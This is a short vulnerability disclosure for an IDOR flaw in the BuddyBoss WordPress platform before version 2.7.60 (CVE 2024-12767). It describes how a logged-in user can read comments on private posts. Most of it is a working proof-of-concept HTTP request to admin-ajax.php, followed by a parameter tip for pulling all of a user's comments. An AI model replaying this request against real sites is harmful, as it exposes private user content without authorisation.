BuddyBoss platform < 2.7.60 – Private Comment Exposure via IDOR | CVE 2024-12767

Description

The plugin lacks proper access controls and allows a logged-in user to view comments on private posts

Proof of Concept

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: REDACTED
Content-Length: 194
Sec-Ch-Ua: "Chromium";v="123", "Not:A-Brand";v="8"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://example.com/members/adele/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Priority: u=1, i

nonce=92142dac65&action=activity_loadmore_comments&activity_id=194627&parent_comment_id=194627&offset=2&activity_type_is_blog=false&last_comment_timestamp=1713779063&last_comment_id=1&modbypass=

```

In order to read all comments by a user, `last_comment_id` parameter should be set to 1